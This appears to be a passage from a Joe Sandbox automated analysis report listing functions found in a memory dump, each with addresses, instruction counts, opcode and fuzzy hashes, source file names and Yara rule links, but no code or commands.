                                  • Opcode ID: 404596d3b938b841a86ee45ee197956f74ae57d563cf23f58c4c0c56d962b1fe
                                  • Instruction ID: e64a4b768a6c4cd3b86fcd01b53d97bb7b3d673b16681468200cf3f3df72019e
                                  • Opcode Fuzzy Hash: 404596d3b938b841a86ee45ee197956f74ae57d563cf23f58c4c0c56d962b1fe
                                  • Instruction Fuzzy Hash: E7513621F0D9490FE76CAB6898256B977D1EF99350B1501BEF05EC32EBDD28AC424781
                                  Function 00007FFD9B8B75C8 Relevance: .2, Instructions: 194COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 216695353e8edea0bfa99e482830aff15ade1b1956d59776c38c9de554f1c68b
                                  • Instruction ID: 9d9cb263f98658dc2ffc9cdacf29f7991509bb87574df77052035476ba453c10
                                  • Opcode Fuzzy Hash: 216695353e8edea0bfa99e482830aff15ade1b1956d59776c38c9de554f1c68b
                                  • Instruction Fuzzy Hash: 45514957A0FBD94FE339477C68750A96B91EF462A470942FFD098870FBEC0859068681
                                  Function 00007FFD9B8B0FA6 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d28670fc753a9e83d40cf8b96b77b8f923b760dc4669c45aaa039514b5003460
                                  • Instruction ID: a6b60c82855d9f29947dc0fcc22263269c35f9b55adea6c2da4fd1416347bab8
                                  • Opcode Fuzzy Hash: d28670fc753a9e83d40cf8b96b77b8f923b760dc4669c45aaa039514b5003460
                                  • Instruction Fuzzy Hash: C1516B2060E29A0FE76697B894A15B63FE1DF4B310B0A40FBD489CF1E7C919AC47C791
                                  Function 00007FFD9B8B34F5 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b79e2c5123405283e6ca567abb708ed7af559e37bd790a12be159da9a3fe0c2
                                  • Instruction ID: 9123ec0ccbc20c43d00e2cf8119d3c8d1480327ee410791d8e333a68236701e0
                                  • Opcode Fuzzy Hash: 5b79e2c5123405283e6ca567abb708ed7af559e37bd790a12be159da9a3fe0c2
                                  • Instruction Fuzzy Hash: 6C41F531B1C6494BEB686B5C58526B977D5EFDD760F10027FE44EC32A3EE25BC028285
                                  Function 00007FFD9B8B8EF2 Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 202cdca85759a807bbe0b3dc7f5f33f548ec042df0ddb84209cdf6f49be8c4e8
                                  • Instruction ID: d4af800776c0ccc2cec5bf2f78e7e6ce403fe0958fc2276c1be8d63f380b59e4
                                  • Opcode Fuzzy Hash: 202cdca85759a807bbe0b3dc7f5f33f548ec042df0ddb84209cdf6f49be8c4e8
                                  • Instruction Fuzzy Hash: 03415962B1EAAA0FEB6DE77CACA58E677A1EF5435870442BBD04EC71D7FC1465034280
                                  Function 00007FFD9B8BABDA Relevance: .2, Instructions: 171COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99e6c7007ac6f2bcf4351dbf28ea1f56f6a7ae6283ed2b02135531a32704602d
                                  • Instruction ID: 3dfeb11e734d01d0e9b32525edf50a41886349aa0f1ba53e19afd30c58494b34
                                  • Opcode Fuzzy Hash: 99e6c7007ac6f2bcf4351dbf28ea1f56f6a7ae6283ed2b02135531a32704602d
                                  • Instruction Fuzzy Hash: 9F51C262A0E7CD1FD767877858752603FE1DF5B210B0A40EBD089CB1B3EC296D068791
                                  Function 00007FFD9B8B2820 Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7fa657a6ff18de03aa28dc927f08f2779588af2c6ec709cc63707d7862f99c6
                                  • Instruction ID: 2780001710f1e0f496e61dba464b6c7e9b645f5dd35dab377c58ad6eb3cac34a
                                  • Opcode Fuzzy Hash: d7fa657a6ff18de03aa28dc927f08f2779588af2c6ec709cc63707d7862f99c6
                                  • Instruction Fuzzy Hash: 8941F731A1DE4D4FEB6CFB289859A6577E1FF59350B0104BDE01EC32A3EE24E8468B00
                                  Function 00007FFD9B8B2570 Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 363f444cfe5f0b79016fb6e29e0781fc00dbfc6894290cc0c4b38bb6d2f44c3d
                                  • Instruction ID: 4be0a5c6efacac42ab2df8d978084965f0ae94ba831d1f148918ab17dc9ca590
                                  • Opcode Fuzzy Hash: 363f444cfe5f0b79016fb6e29e0781fc00dbfc6894290cc0c4b38bb6d2f44c3d
                                  • Instruction Fuzzy Hash: 92414270719E0A8FE758EB6CD495975B3E1EF9D35071501BEE40EC32A2DE24ED418B81
                                  Function 00007FFD9B8B2838 Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4134c188089a3a6ec5661bfeb45deaebf2b35721c2de6679a18bcc22ede67ded
                                  • Instruction ID: b12800d1d7daaa0f368c0bce6da6f72c1251c6cc6ca30bc4232cec5c33cd436a
                                  • Opcode Fuzzy Hash: 4134c188089a3a6ec5661bfeb45deaebf2b35721c2de6679a18bcc22ede67ded
                                  • Instruction Fuzzy Hash: 74412070B0EA0E4FE769B768982297137D0EF5A314B1601BEE44AC31B7ED25FC428781
                                  Function 00007FFD9B8D7650 Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f84c6cf20edd740811e199a009db59ed98fc7a3d86e35848b6ce1d72a9caecd
                                  • Instruction ID: 95c29a309bb785ac19a81a8a2ac72108a3685615ca4fb086cf9ee2542ee639ad
                                  • Opcode Fuzzy Hash: 9f84c6cf20edd740811e199a009db59ed98fc7a3d86e35848b6ce1d72a9caecd
                                  • Instruction Fuzzy Hash: 9041F561B19A4E4BEBACEB5C946567523C2EFDC300F0543BAD41DC72E2ED25AD428740
                                  Function 00007FFD9B8B3510 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 452b4c25a07e2201b9a8d334b9f2cdba0918113179744d143f69781fe950d82f
                                  • Instruction ID: 51b2ad2d7b55e8fa318064c7276bb2ebd3f1706fc7e9c9d1da02d29a20c9cc26
                                  • Opcode Fuzzy Hash: 452b4c25a07e2201b9a8d334b9f2cdba0918113179744d143f69781fe950d82f
                                  • Instruction Fuzzy Hash: 6141E371B1CA4C4BEB6CAB5C68526B977D5EBD9760F00027FE48A83293ED25A81242C5
                                  Function 00007FFD9B8B04DF Relevance: .2, Instructions: 151COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71c82625e9fe2a1c666bd74d8e57f13d7a263119cfdcba1dca346014c900d889
                                  • Instruction ID: 6a5f1054bfc616f4621bc85999e5d2220d1291c03cc901a6a9e02693cfa1aa3e
                                  • Opcode Fuzzy Hash: 71c82625e9fe2a1c666bd74d8e57f13d7a263119cfdcba1dca346014c900d889
                                  • Instruction Fuzzy Hash: 1F412332F1C8094BE368AB6CA8656B977D1EF88355B1401BFF04EC32EBDE14AC064781
                                  Function 00007FFD9B8B35A0 Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 870ae246676a229de295adc4fd86df1dfacb4e657d4de938d0ad4cd6b03c9f4f
                                  • Instruction ID: 0d69cda2d13dfdbe61e1502ac7898db3a629309a99dc95121a60f2b790695039
                                  • Opcode Fuzzy Hash: 870ae246676a229de295adc4fd86df1dfacb4e657d4de938d0ad4cd6b03c9f4f
                                  • Instruction Fuzzy Hash: 3E410420B2AA1E8FE7BCE768846573132D2FFD8719F550AB9D04DC71E5DE29E9818300
                                  Function 00007FFD9B8B35F5 Relevance: .1, Instructions: 146COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a732cda5dd0a09165d39df1cc956b85324c17b1e34dc0c77f3624a0f019e3b82
                                  • Instruction ID: 2e731f8d22761d0762400ab6b7a1a27c947a676fdbfcc0e713d869f6281f3564
                                  • Opcode Fuzzy Hash: a732cda5dd0a09165d39df1cc956b85324c17b1e34dc0c77f3624a0f019e3b82
                                  • Instruction Fuzzy Hash: 7E412961B0DA1A8BEB6CB76CA4656B523C1EF9C314F0543BBE00DC71E7ED25AD428680
                                  Function 00007FFD9B8B2790 Relevance: .1, Instructions: 145COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a9305a73ef9db873c4f727dc6f07c668286ec62cf0b5444c643d7067449c359
                                  • Instruction ID: 9d10326cdbdbaa55eec3544cd0c1440752ceb5ba2d1bd28a8645376d6d14903e
                                  • Opcode Fuzzy Hash: 9a9305a73ef9db873c4f727dc6f07c668286ec62cf0b5444c643d7067449c359
                                  • Instruction Fuzzy Hash: 6431267271D9094FE7A8F76CA8697B577D1EF89360B4601BBD00EC31A7DD25AC428340
                                  Function 00007FFD9B8DB1D0 Relevance: .1, Instructions: 145COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a09022218022f68e0ff995ff53610c0198ea1260b7134d1e0ea7f30e5075c4fb
                                  • Instruction ID: 7ab92bbe38ec65a7eb1041267119f3185a98ec78520d64467c20916ed44b61bd
                                  • Opcode Fuzzy Hash: a09022218022f68e0ff995ff53610c0198ea1260b7134d1e0ea7f30e5075c4fb
                                  • Instruction Fuzzy Hash: 4E41E431B09B498FE775CB28C054B6677D1FF99354F094BBAC08E835E1DA68B985C740
                                  Function 00007FFD9B8B1DB5 Relevance: .1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a0590e4a34b5db17ba02b7c2593f8d4e79e378b68d84a289418fec47d5a41b07
                                  • Instruction ID: 8df9e63f0588261a08e04f00dce14355e6bc1895ce77640ab18d4bfde86c9ecf
                                  • Opcode Fuzzy Hash: a0590e4a34b5db17ba02b7c2593f8d4e79e378b68d84a289418fec47d5a41b07
                                  • Instruction Fuzzy Hash: DE413472E1DA5D4FDB65DB7C88A1AA87BE1EF8D340F0501AAE048D72A2CA246D01C7D1
                                  Function 00007FFD9B8B04C0 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec6b07ce12ea28a2178ee652729a42e0f310562ba659939e1882db2288eff479
                                  • Instruction ID: fae419d70685396b00c859862dd0f0a9036f9f4b1d4d362120d2449202a16f74
                                  • Opcode Fuzzy Hash: ec6b07ce12ea28a2178ee652729a42e0f310562ba659939e1882db2288eff479
                                  • Instruction Fuzzy Hash: 3D414A31B1D12E4FEB68EB68D4A66B93381EF59310F160079D44ECB2D5DD29AC438BD0
                                  Function 00007FFD9B8B3530 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21b276c6996514ce4d1119121ad837c72a3c169615744aa6338408eee93dcb1d
                                  • Instruction ID: 56c6babc778fb6dfa5c418f954501ba6fb8eec81e1755911596f4dec147095a9
                                  • Opcode Fuzzy Hash: 21b276c6996514ce4d1119121ad837c72a3c169615744aa6338408eee93dcb1d
                                  • Instruction Fuzzy Hash: 4C31E571B1CA4D4BEB6C9B5C58566B977D5EBD8760F10027FE44A83293EE25BC0242C1
                                  Function 00007FFD9B8B2B30 Relevance: .1, Instructions: 136COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 584ce91b6c3a441aa69f1bf9ba4442f35b024e48bfd4620e8a3159de0c47a17b
                                  • Instruction ID: 92edd29611c56905c076e103c6293ee404f51fcd3b59432b582b0af68a801291
                                  • Opcode Fuzzy Hash: 584ce91b6c3a441aa69f1bf9ba4442f35b024e48bfd4620e8a3159de0c47a17b
                                  • Instruction Fuzzy Hash: D041E131708A198FDB29EF58D4519B97BE1FF99310B5105ADE04A832B2CE24FD42CBD5
                                  Function 00007FFD9B8B0500 Relevance: .1, Instructions: 136COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af938c1f36f5b03b130738ab15bc284b9eec98fae85718d0f38123bf12e363ea
                                  • Instruction ID: c4937f32a680a56a84a7f8bd99abb5c47607277712e62aad7ad1a5d9d3f65663
                                  • Opcode Fuzzy Hash: af938c1f36f5b03b130738ab15bc284b9eec98fae85718d0f38123bf12e363ea
                                  • Instruction Fuzzy Hash: 89311431F1C9094FE76CAF6C98656B966D1EFD8351B1401BEF04EC32EADE28AC064781
                                  Function 00007FFD9B8B277D Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 025850f37ad5fc779faf46e7a7081e5cdf2e469cfc0738f02fd2c4a05de3555c
                                  • Instruction ID: 8df8019cec22c2ffa51d32b325b422163c4becf4832dbaba422f07b5769ec652
                                  • Opcode Fuzzy Hash: 025850f37ad5fc779faf46e7a7081e5cdf2e469cfc0738f02fd2c4a05de3555c
                                  • Instruction Fuzzy Hash: 45316A7271DA094FE7A8FB6C98A97B577D1EF99350B0901BAD00EC31A7DD24BC428340
                                  Function 00007FFD9B8B2858 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67f54da25f5194c662e32178d2bf3aabc46bd4c6e53959ef74b4493b7cfde5e7
                                  • Instruction ID: 3c111e2938a5e0efe0ab9742118cdacdc193ac03d8bb3742e365e76fc564b27b
                                  • Opcode Fuzzy Hash: 67f54da25f5194c662e32178d2bf3aabc46bd4c6e53959ef74b4493b7cfde5e7
                                  • Instruction Fuzzy Hash: FE31F662B0D90E0FE7A8FA1C9465A7573D2EFD9360B16017BD44EC32AADD24BD428380
                                  Function 00007FFD9B8B27A0 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c75f22b46af81af965ea60ade965bf4d1d703bb33a47b0de9f7c552b475eb865
                                  • Instruction ID: aa373fb1f55fd8eb4e5eeab2cf6bf0ed3fb445a3f7c8f204537c6d5d7b9715e1
                                  • Opcode Fuzzy Hash: c75f22b46af81af965ea60ade965bf4d1d703bb33a47b0de9f7c552b475eb865
                                  • Instruction Fuzzy Hash: 69410730709A084FD7A8EF6CD4A8B7577D1EF59702F4500BAE48DC76A6DE24AC45C781
                                  Function 00007FFD9B8D1E30 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0094eab24bc34f7a2cfa3c0eea0a41a5eece4c40ade6b8d82ae5dafe2aca6204
                                  • Instruction ID: 2f3ed39de108420873a9106a55c89c900537a20eeb9f957f7726a04e3879921c
                                  • Opcode Fuzzy Hash: 0094eab24bc34f7a2cfa3c0eea0a41a5eece4c40ade6b8d82ae5dafe2aca6204
                                  • Instruction Fuzzy Hash: 2941C131A19F0A4BEB74EB5884A4A72B3D1FFAD350B01473ED48EC36A1DA24FD818740
                                  Function 00007FFD9B8B2870 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d30d4f850bdd5e361ddfceedfaee4de3b58b5c0a18b8f23f046d7b504cb92c7f
                                  • Instruction ID: 0869e8b6b7d164f06cb5b99f36c8c37643790d98e9c4b8070f071bf1cdfd8aad
                                  • Opcode Fuzzy Hash: d30d4f850bdd5e361ddfceedfaee4de3b58b5c0a18b8f23f046d7b504cb92c7f
                                  • Instruction Fuzzy Hash: DF314E71B19C0D4FEBE8FA6CA498A7563D1EFAC35171601BAD40DC72BADD25DC828780
                                  Function 00007FFD9B8B2848 Relevance: .1, Instructions: 126COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9495e847979385ce67dcc364f6ac3cfc442826dd7c00b5e7a47ffa04da4446f1
                                  • Instruction ID: db4a7b981d66ba3d2057620c9a8a733d6536ea791a269f5f496634f8a7cdc1ce
                                  • Opcode Fuzzy Hash: 9495e847979385ce67dcc364f6ac3cfc442826dd7c00b5e7a47ffa04da4446f1
                                  • Instruction Fuzzy Hash: 0331B361B1ED0D0FFBB4A6AC64A97B523C1EBAD361B1240BBD40DC32A2EC15AD424780
                                  Function 00007FFD9B8B1638 Relevance: .1, Instructions: 125COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef92eee4154898f6a8416417028c357210c9f29318a8d8bc556fe169e67b0afd
                                  • Instruction ID: f2ce4a1e921250c7bf0439a883d74834cd27aa971af66fd2a3b685301eeb93bf
                                  • Opcode Fuzzy Hash: ef92eee4154898f6a8416417028c357210c9f29318a8d8bc556fe169e67b0afd
                                  • Instruction Fuzzy Hash: F1311672F1D95D4FEF98DB6C8861AA87BE1EF9C340F0501BAE448D72A1CA256D01CBC1
                                  Function 00007FFD9B8B1900 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 672c3db9fdd8f665de5dfa56a63e5df2cde7ad80354973266b18add6d1d5b582
                                  • Instruction ID: 55baeb132e34d29ef7544ef1d03cd10cae4b7c1db0347916a542b69c8e2796dc
                                  • Opcode Fuzzy Hash: 672c3db9fdd8f665de5dfa56a63e5df2cde7ad80354973266b18add6d1d5b582
                                  • Instruction Fuzzy Hash: 6E313922B1D6B70BE72976BCB8692F937D0EF45365F0801BBD489CA1E3ED05554682C4
                                  Function 00007FFD9B8BAD42 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0749bed547aca76a0153d68bb87af81ffbc3dd11f64cca599c37105cd90de182
                                  • Instruction ID: 0fdf7bb8635293ebd6a40e5d8be208716ed83d730e0afb50807084138214e042
                                  • Opcode Fuzzy Hash: 0749bed547aca76a0153d68bb87af81ffbc3dd11f64cca599c37105cd90de182
                                  • Instruction Fuzzy Hash: 7A31683170DE5D4FE369973C98696647BE1EF9935070901FBD04DCB2A3ED24AC058780
                                  Function 00007FFD9B8B6F6D Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99d5eadefc1a65218a4bbb0dd11151e1fd6915fca4feb8308ec0f63df517094a
